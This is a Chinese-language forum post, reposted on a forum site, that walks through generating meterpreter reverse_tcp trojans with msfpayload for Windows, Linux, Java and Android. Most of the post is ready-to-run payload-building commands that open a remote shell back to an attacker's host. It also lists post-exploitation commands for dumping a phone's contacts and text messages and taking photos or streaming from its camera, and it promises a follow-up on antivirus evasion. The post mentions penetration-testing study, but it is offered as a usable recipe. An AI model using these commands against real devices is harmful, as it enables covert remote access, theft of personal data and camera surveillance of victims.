Msfpayload多平台木马实战

论坛 期权论坛 脚本     
匿名技术用户   2020-12-22 11:20   11   0

前言:

msfpayload不仅可以生成windows系统的木马文件,还可以生成LinuxJavaAndroid等环境下的木马,原理是注入一个攻击载荷(Payload),目标一旦打开,就会执行Payload,然后根据Payload的特性执行相关操作,这里我用反连的载荷reverse_tcp.

Windows系统下:

msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=port X > test.exe

1-1.

1-2.

Linux系统下:

msfpayload linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=port X > test

1-3.

1-4.

ls -l 列出文件以及文件的详细信息;./代表执行一个文件;chmod 777 linux_backdoor表示设置linux_backdoor的权限为最高.

1-5.

Java环境下:

msfpayload java/meterpreter/reverse_tcp LHOST=IP LPORT=port X > test.jar

1-6.

1-7.

Android环境下:

msfpayload android/meterpreter/reverse_tcp LHOST=IP LPORT=port X > android_backdoor.apk

1-8.

1-9.

dump_contacts //导出电话

dump_sms //导出信息

Webcam_list //可以看到摄像头数量

-i 1 //选择后摄像头

webcam_snap //拍照

webcam_stream //开启摄像头

后语:

这些木马程序没有经过免杀,只要用户装了杀毒软件,秒秒钟被杀,如果想让木马免杀,请关注我的下一篇文章。

最后感谢Cracer,我是一直看他的视频,文档资料学习渗透测试的,对于这些难得的免费资料,难得的分享精神和高质量的技术干货,着实让人敬畏,想要提高自己技术的朋友可以到他的网站看一下:http://cracer.com/

因为有了无数像Cracer这类人走在前面,我们才能站在巨人的肩膀上,学得更深,看得更远!

分享到 :
0 人收藏
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

积分:7942463
帖子:1588486
精华:0
期权论坛 期权论坛
发布
内容

下载期权论坛手机APP